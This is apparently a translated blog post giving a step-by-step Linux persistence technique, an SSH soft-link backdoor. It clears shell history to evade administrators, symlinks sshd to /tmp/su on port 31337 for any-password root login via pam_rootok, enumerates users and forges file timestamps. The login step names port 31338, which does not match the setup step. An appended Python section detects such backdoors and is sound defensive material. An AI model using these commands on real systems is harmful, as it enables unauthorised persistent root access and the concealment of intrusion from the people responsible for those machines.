Maintaining privileges with SSH (easy)

We often need to keep the access we have gained on a machine. A reverse shell added as a scheduled job is easy for operations and maintenance staff to spot, and some scenarios do not call for a rootkit-level backdoor. In those cases we can try an SSH backdoor.

 

1. Purpose

Keep root privileges on the machine over the long term. The backdoor also has to avoid detection by administrators: hidden communication, hidden autostart, hidden files, hidden processes/modules, hidden registry entries, hidden services, hidden ports, and so on.

Clearing the SSH command history: run this first after logging in

unset HISTFILE;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace

After this, putting a space before each command you type keeps it out of the command history.

2. Setting up the backdoor
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337
3. Log in through the backdoor with any password
ssh root:[email protected] -p 31338
4. See which users exist
cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" '{ print $1"|"$3"|"$4 }'|more
# as follows
root|0|0
sync|4|65534
mysql|104|109
postgres|113|117
arpwatch|117|120
Debian-snmp|118|123
speech-dispatcher|127|29
Debian-gdm|130|138
5. Modify the timestamps of uploaded files

touch -r old_file new_file    (gives the new file the old file's timestamp)

6. Exit ssh
exit
Note

The core of the any-password login is auth sufficient pam_rootok.so: as long as a PAM configuration file contains this line, SSH accepts any password. Practice shows that the PAM configuration files that can be used successfully are, besides su, chsh and chfn.
1. Prerequisite: the Linux soft-link SSH backdoor requires that the ssh configuration allows PAM authentication.
2. If the target host does not allow root login, log in as another existing user.
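
The two conditions in this note can be checked on a host. The following is an added example, not code from the original post: it lists the PAM services that have an active auth sufficient pam_rootok.so line and finds symlinks that resolve to sshd but are named after one of them. It relies on sshd using the name it was started under as its PAM service name; the function names and the sample tree built in demo() are constructed for illustration.

```python
import os
import re
import tempfile

# An active (uncommented) "auth sufficient pam_rootok.so" line, as named in the note.
ROOTOK = re.compile(r"^\s*auth\s+sufficient\s+pam_rootok\.so\b", re.M)

def rootok_services(pam_dir="/etc/pam.d"):
    """PAM service names whose config accepts root without checking a password."""
    found = set()
    for name in os.listdir(pam_dir):
        path = os.path.join(pam_dir, name)
        if os.path.isfile(path):
            with open(path, errors="replace") as fh:
                if ROOTOK.search(fh.read()):
                    found.add(name)
    return found

def sshd_links(roots, services, sshd_name="sshd"):
    """Symlinks under roots that resolve to sshd but carry a pam_rootok service name."""
    hits = []
    for root in roots:
        # os.walk does not follow symlinks, so every link is inspected, not entered.
        for dirpath, dirnames, filenames in os.walk(root):
            for name in dirnames + filenames:
                path = os.path.join(dirpath, name)
                if (os.path.islink(path) and name in services
                        and os.path.basename(os.path.realpath(path)) == sshd_name):
                    hits.append(path)
    return sorted(hits)

def demo():
    """Run both checks on a constructed tree (sample data, not from a real host)."""
    with tempfile.TemporaryDirectory() as top:
        pam, sbin, tmp = (os.path.join(top, d) for d in ("pam.d", "sbin", "tmp"))
        for d in (pam, sbin, tmp):
            os.mkdir(d)
        samples = {"su": "auth sufficient pam_rootok.so\n",
                   "chfn": "auth\tsufficient\tpam_rootok.so\n",
                   "login": "# auth sufficient pam_rootok.so\n",
                   "sshd": "auth required pam_unix.so\n"}
        for name, body in samples.items():
            with open(os.path.join(pam, name), "w") as fh:
                fh.write(body)
        open(os.path.join(sbin, "sshd"), "w").close()  # stand-in for the sshd binary
        os.symlink(os.path.join(sbin, "sshd"), os.path.join(tmp, "su"))
        os.symlink(os.path.join(sbin, "sshd"), os.path.join(tmp, "notes"))
        services = rootok_services(pam)
        return services, [os.path.relpath(p, top) for p in sshd_links([tmp], services)]
```

On a real host, call rootok_services() with its default path and pass writable directories such as /tmp to sshd_links(); a link removed after sshd was started will not be found this way.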


Origin www.cnblogs.com/Rightsec/p/11006189.html